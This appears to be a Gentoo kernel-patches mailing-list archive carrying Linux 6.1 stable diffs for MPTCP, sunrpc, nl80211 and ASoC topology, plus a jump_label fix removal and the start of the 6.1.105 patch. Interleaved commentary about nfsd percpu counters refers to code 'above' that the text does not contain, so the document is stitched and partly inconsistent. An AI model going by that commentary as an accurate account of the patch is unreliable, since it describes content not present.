+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -352,7 +352,7 @@ mptcp_pm_del_add_timer(struct mptcp_sock *msk,
+ }
+ 
+ bool mptcp_pm_alloc_anno_list(struct mptcp_sock *msk,
+-			      const struct mptcp_pm_addr_entry *entry)
++			      const struct mptcp_addr_info *addr)
+ {
+ 	struct mptcp_pm_add_entry *add_entry = NULL;
+ 	struct sock *sk = (struct sock *)msk;
+@@ -360,10 +360,10 @@ bool mptcp_pm_alloc_anno_list(struct mptcp_sock *msk,
+ 
+ 	lockdep_assert_held(&msk->pm.lock);
+ 
+-	add_entry = mptcp_lookup_anno_list_by_saddr(msk, &entry->addr);
++	add_entry = mptcp_lookup_anno_list_by_saddr(msk, addr);
+ 
+ 	if (add_entry) {
+-		if (mptcp_pm_is_kernel(msk))
++		if (WARN_ON_ONCE(mptcp_pm_is_kernel(msk)))
+ 			return false;
+ 
+ 		sk_reset_timer(sk, &add_entry->add_timer,
+@@ -377,7 +377,7 @@ bool mptcp_pm_alloc_anno_list(struct mptcp_sock *msk,
+ 
+ 	list_add(&add_entry->list, &msk->pm.anno_list);
+ 
+-	add_entry->addr = entry->addr;
++	add_entry->addr = *addr;
+ 	add_entry->sock = msk;
+ 	add_entry->retrans_times = 0;
+ 
+@@ -524,8 +524,8 @@ __lookup_addr(struct pm_nl_pernet *pernet, const struct mptcp_addr_info *info,
+ 
+ static void mptcp_pm_create_subflow_or_signal_addr(struct mptcp_sock *msk)
+ {
++	struct mptcp_pm_addr_entry *local, *signal_and_subflow = NULL;
+ 	struct sock *sk = (struct sock *)msk;
+-	struct mptcp_pm_addr_entry *local;
+ 	unsigned int add_addr_signal_max;
+ 	unsigned int local_addr_max;
+ 	struct pm_nl_pernet *pernet;
+@@ -567,8 +567,6 @@ static void mptcp_pm_create_subflow_or_signal_addr(struct mptcp_sock *msk)
+ 
+ 	/* check first for announce */
+ 	if (msk->pm.add_addr_signaled < add_addr_signal_max) {
+-		local = select_signal_address(pernet, msk);
+-
+ 		/* due to racing events on both ends we can reach here while
+ 		 * previous add address is still running: if we invoke now
+ 		 * mptcp_pm_announce_addr(), that will fail and the
+@@ -579,16 +577,26 @@ static void mptcp_pm_create_subflow_or_signal_addr(struct mptcp_sock *msk)
+ 		if (msk->pm.addr_signal & BIT(MPTCP_ADD_ADDR_SIGNAL))
+ 			return;
+ 
+-		if (local) {
+-			if (mptcp_pm_alloc_anno_list(msk, local)) {
+-				__clear_bit(local->addr.id, msk->pm.id_avail_bitmap);
+-				msk->pm.add_addr_signaled++;
+-				mptcp_pm_announce_addr(msk, &local->addr, false);
+-				mptcp_pm_nl_addr_send_ack(msk);
+-			}
+-		}
++		local = select_signal_address(pernet, msk);
++		if (!local)
++			goto subflow;
++
++		/* If the alloc fails, we are under memory pressure: not worth
++		 * continuing or trying to create subflows.
++		 */
++		if (!mptcp_pm_alloc_anno_list(msk, &local->addr))
++			return;
++
++		__clear_bit(local->addr.id, msk->pm.id_avail_bitmap);
++		msk->pm.add_addr_signaled++;
++		mptcp_pm_announce_addr(msk, &local->addr, false);
++		mptcp_pm_nl_addr_send_ack(msk);
++
++		if (local->flags & MPTCP_PM_ADDR_FLAG_SUBFLOW)
++			signal_and_subflow = local;
+ 	}
+ 
++subflow:
+ 	/* check if should create a new subflow */
+ 	while (msk->pm.local_addr_used < local_addr_max &&
+ 	       msk->pm.subflows < subflows_max) {
+@@ -596,9 +604,14 @@ static void mptcp_pm_create_subflow_or_signal_addr(struct mptcp_sock *msk)
+ 		bool fullmesh;
+ 		int i, nr;
+ 
+-		local = select_local_address(pernet, msk);
+-		if (!local)
+-			break;
++		if (signal_and_subflow) {
++			local = signal_and_subflow;
++			signal_and_subflow = NULL;
++		} else {
++			local = select_local_address(pernet, msk);
++			if (!local)
++				break;
++		}
+ 
+ 		fullmesh = !!(local->flags & MPTCP_PM_ADDR_FLAG_FULLMESH);
+ 
+diff --git a/net/mptcp/pm_userspace.c b/net/mptcp/pm_userspace.c
+index 278ba5955dfd1d..f2b90053ecae78 100644
+--- a/net/mptcp/pm_userspace.c
++++ b/net/mptcp/pm_userspace.c
+@@ -225,7 +225,7 @@ int mptcp_nl_cmd_announce(struct sk_buff *skb, struct genl_info *info)
+ 	lock_sock((struct sock *)msk);
+ 	spin_lock_bh(&msk->pm.lock);
+ 
+-	if (mptcp_pm_alloc_anno_list(msk, &addr_val)) {
++	if (mptcp_pm_alloc_anno_list(msk, &addr_val.addr)) {
+ 		msk->pm.add_addr_signaled++;
+ 		mptcp_pm_announce_addr(msk, &addr_val.addr, false);
+ 		mptcp_pm_nl_addr_send_ack(msk);
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 9e582725ccb412..4515cc6b649fc4 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -812,7 +812,7 @@ int mptcp_pm_nl_mp_prio_send_ack(struct mptcp_sock *msk,
+ 				 struct mptcp_addr_info *rem,
+ 				 u8 bkup);
+ bool mptcp_pm_alloc_anno_list(struct mptcp_sock *msk,
+-			      const struct mptcp_pm_addr_entry *entry);
++			      const struct mptcp_addr_info *addr);
+ void mptcp_pm_free_anno_list(struct mptcp_sock *msk);
+ bool mptcp_pm_sport_in_anno_list(struct mptcp_sock *msk, const struct sock *sk);
+ struct mptcp_pm_add_entry *
+diff --git a/net/sunrpc/stats.c b/net/sunrpc/stats.c
+index 52908f9e6eab54..9a0b3e8cc62d41 100644
+--- a/net/sunrpc/stats.c
++++ b/net/sunrpc/stats.c
+@@ -309,7 +309,7 @@ EXPORT_SYMBOL_GPL(rpc_proc_unregister);
+ struct proc_dir_entry *
+ svc_proc_register(struct net *net, struct svc_stat *statp, const struct proc_ops *proc_ops)
+ {
+-	return do_register(net, statp->program->pg_name, statp, proc_ops);
++	return do_register(net, statp->program->pg_name, net, proc_ops);
+ }
+ EXPORT_SYMBOL_GPL(svc_proc_register);
+ 
+diff --git a/net/sunrpc/svc.c b/net/sunrpc/svc.c
+index 666d738bcf07e4..9ae85347ab397a 100644
+--- a/net/sunrpc/svc.c
++++ b/net/sunrpc/svc.c
+@@ -453,8 +453,8 @@ __svc_init_bc(struct svc_serv *serv)
+  * Create an RPC service
+  */
+ static struct svc_serv *
+-__svc_create(struct svc_program *prog, unsigned int bufsize, int npools,
+-	     int (*threadfn)(void *data))
++__svc_create(struct svc_program *prog, struct svc_stat *stats,
++	     unsigned int bufsize, int npools, int (*threadfn)(void *data))
+ {
+ 	struct svc_serv	*serv;
+ 	unsigned int vers;
+@@ -466,7 +466,7 @@ __svc_create(struct svc_program *prog, unsigned int bufsize, int npools,
+ 	serv->sv_name      = prog->pg_name;
+ 	serv->sv_program   = prog;
+ 	kref_init(&serv->sv_refcnt);
+-	serv->sv_stats     = prog->pg_stats;
++	serv->sv_stats     = stats;
+ 	if (bufsize > RPCSVC_MAXPAYLOAD)
+ 		bufsize = RPCSVC_MAXPAYLOAD;
+ 	serv->sv_max_payload = bufsize? bufsize : 4096;
+@@ -528,26 +528,28 @@ __svc_create(struct svc_program *prog, unsigned int bufsize, int npools,
+ struct svc_serv *svc_create(struct svc_program *prog, unsigned int bufsize,
+ 			    int (*threadfn)(void *data))
+ {
+-	return __svc_create(prog, bufsize, 1, threadfn);
++	return __svc_create(prog, NULL, bufsize, 1, threadfn);
+ }
+ EXPORT_SYMBOL_GPL(svc_create);
+ 
+ /**
+  * svc_create_pooled - Create an RPC service with pooled threads
+  * @prog: the RPC program the new service will handle
++ * @stats: the stats struct if desired
+  * @bufsize: maximum message size for @prog
+  * @threadfn: a function to service RPC requests for @prog
+  *
+  * Returns an instantiated struct svc_serv object or NULL.
+  */
+ struct svc_serv *svc_create_pooled(struct svc_program *prog,
++				   struct svc_stat *stats,
+ 				   unsigned int bufsize,
+ 				   int (*threadfn)(void *data))
+ {
+ 	struct svc_serv *serv;
+ 	unsigned int npools = svc_pool_map_get();
+ 
+-	serv = __svc_create(prog, bufsize, npools, threadfn);
++	serv = __svc_create(prog, stats, bufsize, npools, threadfn);
+ 	if (!serv)
+ 		goto out_err;
+ 	return serv;
+@@ -1324,7 +1326,8 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
+ 		goto err_bad_proc;
+ 
+ 	/* Syntactic check complete */
+-	serv->sv_stats->rpccnt++;
++	if (serv->sv_stats)
++		serv->sv_stats->rpccnt++;
+ 	trace_svc_process(rqstp, progp->pg_name);
+ 
+ 	/* Build the reply header. */
+@@ -1377,7 +1380,8 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
+ 	goto close_xprt;
+ 
+ err_bad_rpc:
+-	serv->sv_stats->rpcbadfmt++;
++	if (serv->sv_stats)
++		serv->sv_stats->rpcbadfmt++;
+ 	svc_putnl(resv, 1);	/* REJECT */
+ 	svc_putnl(resv, 0);	/* RPC_MISMATCH */
+ 	svc_putnl(resv, 2);	/* Only RPCv2 supported */
+@@ -1387,7 +1391,8 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
+ err_bad_auth:
+ 	dprintk("svc: authentication failed (%d)\n",
+ 		be32_to_cpu(rqstp->rq_auth_stat));
+-	serv->sv_stats->rpcbadauth++;
++	if (serv->sv_stats)
++		serv->sv_stats->rpcbadauth++;
+ 	/* Restore write pointer to location of accept status: */
+ 	xdr_ressize_check(rqstp, reply_statp);
+ 	svc_putnl(resv, 1);	/* REJECT */
+@@ -1397,7 +1402,8 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
+ 
+ err_bad_prog:
+ 	dprintk("svc: unknown program %d\n", prog);
+-	serv->sv_stats->rpcbadfmt++;
++	if (serv->sv_stats)
++		serv->sv_stats->rpcbadfmt++;
+ 	svc_putnl(resv, RPC_PROG_UNAVAIL);
+ 	goto sendit;
+ 
+@@ -1405,7 +1411,8 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
+ 	svc_printk(rqstp, "unknown version (%d for prog %d, %s)\n",
+ 		       rqstp->rq_vers, rqstp->rq_prog, progp->pg_name);
+ 
+-	serv->sv_stats->rpcbadfmt++;
++	if (serv->sv_stats)
++		serv->sv_stats->rpcbadfmt++;
+ 	svc_putnl(resv, RPC_PROG_MISMATCH);
+ 	svc_putnl(resv, process.mismatch.lovers);
+ 	svc_putnl(resv, process.mismatch.hivers);
+@@ -1414,7 +1421,8 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
+ err_bad_proc:
+ 	svc_printk(rqstp, "unknown procedure (%d)\n", rqstp->rq_proc);
+ 
+-	serv->sv_stats->rpcbadfmt++;
++	if (serv->sv_stats)
++		serv->sv_stats->rpcbadfmt++;
+ 	svc_putnl(resv, RPC_PROC_UNAVAIL);
+ 	goto sendit;
+ 
+@@ -1423,7 +1431,8 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
+ 
+ 	rpc_stat = rpc_garbage_args;
+ err_bad:
+-	serv->sv_stats->rpcbadfmt++;
++	if (serv->sv_stats)
++		serv->sv_stats->rpcbadfmt++;
+ 	svc_putnl(resv, ntohl(rpc_stat));
+ 	goto sendit;
+ }
+@@ -1469,7 +1478,8 @@ svc_process(struct svc_rqst *rqstp)
+ out_baddir:
+ 	svc_printk(rqstp, "bad direction 0x%08x, dropping request\n",
+ 		   be32_to_cpu(dir));
+-	rqstp->rq_server->sv_stats->rpcbadfmt++;
++	if (rqstp->rq_server->sv_stats)
++		rqstp->rq_server->sv_stats->rpcbadfmt++;
+ out_drop:
+ 	svc_drop(rqstp);
+ 	return 0;
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 214eee6105c7f2..dd9695306fb85d 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -463,6 +463,10 @@ nl80211_sta_wme_policy[NL80211_STA_WME_MAX + 1] = {
+ 	[NL80211_STA_WME_MAX_SP] = { .type = NLA_U8 },
+ };
+ 
++static struct netlink_range_validation q_range = {
++	.max = INT_MAX,
++};
++
+ static const struct nla_policy nl80211_policy[NUM_NL80211_ATTR] = {
+ 	[0] = { .strict_start_type = NL80211_ATTR_HE_OBSS_PD },
+ 	[NL80211_ATTR_WIPHY] = { .type = NLA_U32 },
+@@ -745,7 +749,7 @@ static const struct nla_policy nl80211_policy[NUM_NL80211_ATTR] = {
+ 
+ 	[NL80211_ATTR_TXQ_LIMIT] = { .type = NLA_U32 },
+ 	[NL80211_ATTR_TXQ_MEMORY_LIMIT] = { .type = NLA_U32 },
+-	[NL80211_ATTR_TXQ_QUANTUM] = { .type = NLA_U32 },
++	[NL80211_ATTR_TXQ_QUANTUM] = NLA_POLICY_FULL_RANGE(NLA_U32, &q_range),
+ 	[NL80211_ATTR_HE_CAPABILITY] =
+ 		NLA_POLICY_VALIDATE_FN(NLA_BINARY, validate_he_capa,
+ 				       NL80211_HE_MAX_CAPABILITY_LEN),
+diff --git a/sound/soc/soc-topology.c b/sound/soc/soc-topology.c
+index d3cbfa6a704f94..fcb8a36d4a06c1 100644
+--- a/sound/soc/soc-topology.c
++++ b/sound/soc/soc-topology.c
+@@ -1062,6 +1062,7 @@ static int soc_tplg_dapm_graph_elems_load(struct soc_tplg *tplg,
+ 	struct snd_soc_tplg_hdr *hdr)
+ {
+ 	struct snd_soc_dapm_context *dapm = &tplg->comp->dapm;
++	const size_t maxlen = SNDRV_CTL_ELEM_ID_NAME_MAXLEN;
+ 	struct snd_soc_tplg_dapm_graph_elem *elem;
+ 	struct snd_soc_dapm_route *route;
+ 	int count, i;
+@@ -1085,39 +1086,22 @@ static int soc_tplg_dapm_graph_elems_load(struct soc_tplg *tplg,
+ 		tplg->pos += sizeof(struct snd_soc_tplg_dapm_graph_elem);
+ 
+ 		/* validate routes */
+-		if (strnlen(elem->source, SNDRV_CTL_ELEM_ID_NAME_MAXLEN) ==
+-			    SNDRV_CTL_ELEM_ID_NAME_MAXLEN) {
+-			ret = -EINVAL;
+-			break;
+-		}
+-		if (strnlen(elem->sink, SNDRV_CTL_ELEM_ID_NAME_MAXLEN) ==
+-			    SNDRV_CTL_ELEM_ID_NAME_MAXLEN) {
+-			ret = -EINVAL;
+-			break;
+-		}
+-		if (strnlen(elem->control, SNDRV_CTL_ELEM_ID_NAME_MAXLEN) ==
+-			    SNDRV_CTL_ELEM_ID_NAME_MAXLEN) {
++		if ((strnlen(elem->source, maxlen) == maxlen) ||
++		    (strnlen(elem->sink, maxlen) == maxlen) ||
++		    (strnlen(elem->control, maxlen) == maxlen)) {
+ 			ret = -EINVAL;
+ 			break;
+ 		}
+ 
+-		route->source = devm_kmemdup(tplg->dev, elem->source,
+-					     min(strlen(elem->source),
+-						 SNDRV_CTL_ELEM_ID_NAME_MAXLEN),
+-					     GFP_KERNEL);
+-		route->sink = devm_kmemdup(tplg->dev, elem->sink,
+-					   min(strlen(elem->sink), SNDRV_CTL_ELEM_ID_NAME_MAXLEN),
+-					   GFP_KERNEL);
++		route->source = devm_kstrdup(tplg->dev, elem->source, GFP_KERNEL);
++		route->sink = devm_kstrdup(tplg->dev, elem->sink, GFP_KERNEL);
+ 		if (!route->source || !route->sink) {
+ 			ret = -ENOMEM;
+ 			break;
+ 		}
+ 
+-		if (strnlen(elem->control, SNDRV_CTL_ELEM_ID_NAME_MAXLEN) != 0) {
+-			route->control = devm_kmemdup(tplg->dev, elem->control,
+-						      min(strlen(elem->control),
+-							  SNDRV_CTL_ELEM_ID_NAME_MAXLEN),
+-						      GFP_KERNEL);
++		if (strnlen(elem->control, maxlen) != 0) {
++			route->control = devm_kstrdup(tplg->dev, elem->control, GFP_KERNEL);
+ 			if (!route->control) {
+ 				ret = -ENOMEM;
+ 				break;
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index a2831076465409..a73358d753aa73 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -2090,6 +2090,20 @@ signal_address_tests()
+ 		chk_add_nr 1 1
+ 	fi
+ 
++	# uncommon: subflow and signal flags on the same endpoint, e.g. because
++	# the user wrongly picked both, while still expecting the client
++	# to create additional subflows
++	if reset "subflow and signal together"; then
++		pm_nl_set_limits $ns1 0 2
++		pm_nl_set_limits $ns2 0 2
++		pm_nl_add_endpoint $ns2 10.0.3.2 flags signal,subflow
++		run_tests $ns1 $ns2 10.0.1.1
++		chk_join_nr 1 1 1
++		chk_add_nr 0 0 0         # none initiated by ns1
++		chk_rst_nr 0 0 invert    # no RST sent by the client
++		chk_rst_nr 0 0           # no RST sent by the server
++	fi
++
+ 	# accept and use add_addr with additional subflows
+ 	if reset "multiple subflows and signal"; then
+ 		pm_nl_set_limits $ns1 0 3


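The nfsd portion of this patch repeatedly exercises one pattern: a fixed-size array of percpu counters that is initialized as a unit and unwound on partial failure, now hung off the per-network-namespace nfsd_net instead of a global. A minimal sketch of that pattern, assuming only the generic <linux/percpu_counter.h> API; the function name here is illustrative, not the nfsd symbol:

	#include <linux/gfp.h>
	#include <linux/percpu_counter.h>

	/* Initialize @num counters; on failure, tear down the ones already up. */
	static int example_counters_init(struct percpu_counter *counters, int num)
	{
		int i, err;

		for (i = 0; i < num; i++) {
			err = percpu_counter_init(&counters[i], 0, GFP_KERNEL);
			if (err)
				goto out_unwind;
		}
		return 0;

	out_unwind:
		while (--i >= 0)
			percpu_counter_destroy(&counters[i]);
		return err;
	}

A per-netns caller embeds the array in its net-generic state and pairs this with a matching destroy loop on namespace exit, which is the shape of the nfsd_stat_counters_init()/nfsd_stat_counters_destroy() pair above.
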
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-08-14 15:06 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-08-14 15:06 UTC (permalink / raw
  To: gentoo-commits

commit:     2a0746e7656990fa60429298671cbb8eedc928e9
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Aug 14 15:05:36 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Aug 14 15:05:36 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2a0746e7

Remove redundant patch

Removed:
2960_jump-label-fix.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README               |  4 ----
 2960_jump-label-fix.patch | 57 -----------------------------------------------
 2 files changed, 61 deletions(-)

diff --git a/0000_README b/0000_README
index e2c1d859..a89ea6e6 100644
--- a/0000_README
+++ b/0000_README
@@ -499,10 +499,6 @@ Patch:  2950_kbuild-CRC32-1MB-dict-xz-modules.patch
 From:   https://git.kernel.org/pub/scm/linux/kernel/git/masahiroy/linux-kbuild.git/commit/?h=kbuild&id=fbf5892df21a8ccfcb2fda0fd65bc3169c89ed28
 Desc:   kbuild: Use CRC32 and a 1MiB dictionary for XZ compressed modules
 
-Patch:  2960_jump-label-fix.patch
-From:   https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/
-Desc:   jump_label: Fix a regression
-
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2960_jump-label-fix.patch b/2960_jump-label-fix.patch
deleted file mode 100644
index 1a5fdf7a..00000000
--- a/2960_jump-label-fix.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 224fa3552029a3d14bec7acf72ded8171d551b88 Mon Sep 17 00:00:00 2001
-From: Peter Zijlstra <peterz@infradead.org>
-Date: Wed, 31 Jul 2024 12:43:21 +0200
-Subject: jump_label: Fix the fix, brown paper bags galore
-
-Per the example of:
-
-  !atomic_cmpxchg(&key->enabled, 0, 1)
-
-the inverse was written as:
-
-  atomic_cmpxchg(&key->enabled, 1, 0)
-
-except of course, that while !old is only true for old == 0, old is
-true for everything except old == 0.
-
-Fix it to read:
-
-  atomic_cmpxchg(&key->enabled, 1, 0) == 1
-
-such that only the 1->0 transition returns true and goes on to disable
-the keys.
-
-Fixes: 83ab38ef0a0b ("jump_label: Fix concurrency issues in static_key_slow_dec()")
-Reported-by: Darrick J. Wong <djwong@kernel.org>
-Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
-Tested-by: Darrick J. Wong <djwong@kernel.org>
-Link: https://lkml.kernel.org/r/20240731105557.GY33588@noisy.programming.kicks-ass.net
----
- kernel/jump_label.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/kernel/jump_label.c b/kernel/jump_label.c
-index 4ad5ed8adf9691..6dc76b590703ed 100644
---- a/kernel/jump_label.c
-+++ b/kernel/jump_label.c
-@@ -236,7 +236,7 @@ void static_key_disable_cpuslocked(struct static_key *key)
- 	}
- 
- 	jump_label_lock();
--	if (atomic_cmpxchg(&key->enabled, 1, 0))
-+	if (atomic_cmpxchg(&key->enabled, 1, 0) == 1)
- 		jump_label_update(key);
- 	jump_label_unlock();
- }
-@@ -289,7 +289,7 @@ static void __static_key_slow_dec_cpuslocked(struct static_key *key)
- 		return;
- 
- 	guard(mutex)(&jump_label_mutex);
--	if (atomic_cmpxchg(&key->enabled, 1, 0))
-+	if (atomic_cmpxchg(&key->enabled, 1, 0) == 1)
- 		jump_label_update(key);
- 	else
- 		WARN_ON_ONCE(!static_key_slow_try_dec(key));
--- 
-cgit 1.2.3-korg
-
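
The commit message above hinges on atomic_cmpxchg() returning the prior value: testing that result for truth succeeds for any nonzero prior value, not only for the intended 1->0 transition. A minimal user-space sketch of the return-value semantics, using a plain non-atomic stand-in (names are illustrative, not kernel code):

	#include <stdio.h>

	/* Mimics the kernel atomic_cmpxchg() return convention: store @new
	 * only if *@v equals @old, and return the prior value either way. */
	static int cmpxchg_like(int *v, int old, int new)
	{
		int prev = *v;

		if (prev == old)
			*v = new;
		return prev;
	}

	int main(void)
	{
		int enabled = 2;	/* the static key still has two users */

		/* Old test: prev == 2 is truthy, so this branch is wrongly
		 * taken even though no 1->0 transition happened. */
		if (cmpxchg_like(&enabled, 1, 0))
			puts("buggy test fires for enabled == 2");

		enabled = 1;
		/* Fixed test: true only when the value really went 1 -> 0. */
		if (cmpxchg_like(&enabled, 1, 0) == 1)
			puts("fixed test fires only on the 1->0 transition");
		return 0;
	}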


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-08-14 14:11 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-08-14 14:11 UTC (permalink / raw
  To: gentoo-commits

commit:     7e54b6e2477ea34e0449f6e35c418e158a256d8d
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Aug 14 14:10:58 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Aug 14 14:10:58 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=7e54b6e2

Linux patch 6.1.105

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    4 +
 1104_linux-6.1.105.patch | 5325 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 5329 insertions(+)

diff --git a/0000_README b/0000_README
index e41d3db8..e2c1d859 100644
--- a/0000_README
+++ b/0000_README
@@ -459,6 +459,10 @@ Patch:  1103_linux-6.1.104.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.104
 
+Patch:  1104_linux-6.1.105.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.105
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1104_linux-6.1.105.patch b/1104_linux-6.1.105.patch
new file mode 100644
index 00000000..f65bfdcc
--- /dev/null
+++ b/1104_linux-6.1.105.patch
@@ -0,0 +1,5325 @@
+diff --git a/Documentation/admin-guide/cifs/usage.rst b/Documentation/admin-guide/cifs/usage.rst
+index a50047cf95ca2..1cd09795f1438 100644
+--- a/Documentation/admin-guide/cifs/usage.rst
++++ b/Documentation/admin-guide/cifs/usage.rst
+@@ -741,7 +741,7 @@ SecurityFlags		Flags which control security negotiation and
+ 			  may use NTLMSSP               		0x00080
+ 			  must use NTLMSSP           			0x80080
+ 			  seal (packet encryption)			0x00040
+-			  must seal (not implemented yet)               0x40040
++			  must seal                                     0x40040
+ 
+ cifsFYI			If set to non-zero value, additional debug information
+ 			will be logged to the system error log.  This field
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index e6f0570cf4900..8df4c1c5c6197 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -637,12 +637,6 @@
+ 			loops can be debugged more effectively on production
+ 			systems.
+ 
+-	clocksource.max_cswd_read_retries= [KNL]
+-			Number of clocksource_watchdog() retries due to
+-			external delays before the clock will be marked
+-			unstable.  Defaults to two retries, that is,
+-			three attempts to read the clock under test.
+-
+ 	clocksource.verify_n_cpus= [KNL]
+ 			Limit the number of CPUs checked for clocksources
+ 			marked with CLOCK_SOURCE_VERIFY_PERCPU that
+@@ -4556,11 +4550,9 @@
+ 
+ 	profile=	[KNL] Enable kernel profiling via /proc/profile
+ 			Format: [<profiletype>,]<number>
+-			Param: <profiletype>: "schedule", "sleep", or "kvm"
++			Param: <profiletype>: "schedule" or "kvm"
+ 				[defaults to kernel profiling]
+ 			Param: "schedule" - profile schedule points.
+-			Param: "sleep" - profile D-state sleeping (millisecs).
+-				Requires CONFIG_SCHEDSTATS
+ 			Param: "kvm" - profile VM exits.
+ 			Param: <number> - step/bucket size as a power of 2 for
+ 				statistical time based profiling.
+diff --git a/Documentation/arm64/silicon-errata.rst b/Documentation/arm64/silicon-errata.rst
+index 27135b9c07acb..6451e9198fef7 100644
+--- a/Documentation/arm64/silicon-errata.rst
++++ b/Documentation/arm64/silicon-errata.rst
+@@ -109,8 +109,16 @@ stable kernels.
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A76      | #1463225        | ARM64_ERRATUM_1463225       |
+ +----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-A76      | #3324349        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A77      | #1508412        | ARM64_ERRATUM_1508412       |
+ +----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-A77      | #3324348        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-A78      | #3324344        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-A78C     | #3324346,3324347| ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A510     | #2051678        | ARM64_ERRATUM_2051678       |
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A510     | #2077057        | ARM64_ERRATUM_2077057       |
+@@ -125,22 +133,50 @@ stable kernels.
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A710     | #2224489        | ARM64_ERRATUM_2224489       |
+ +----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-A710     | #3324338        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-A720     | #3456091        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-A725     | #3456106        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-X1       | #3324344        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-X1C      | #3324346        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-X2       | #2119858        | ARM64_ERRATUM_2119858       |
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-X2       | #2224489        | ARM64_ERRATUM_2224489       |
+ +----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-X2       | #3324338        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-X3       | #3324335        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-X4       | #3194386        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-X925     | #3324334        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Neoverse-N1     | #1188873,1418040| ARM64_ERRATUM_1418040       |
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Neoverse-N1     | #1349291        | N/A                         |
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Neoverse-N1     | #1542419        | ARM64_ERRATUM_1542419       |
+ +----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Neoverse-N1     | #3324349        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Neoverse-N2     | #2139208        | ARM64_ERRATUM_2139208       |
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Neoverse-N2     | #2067961        | ARM64_ERRATUM_2067961       |
+ +----------------+-----------------+-----------------+-----------------------------+
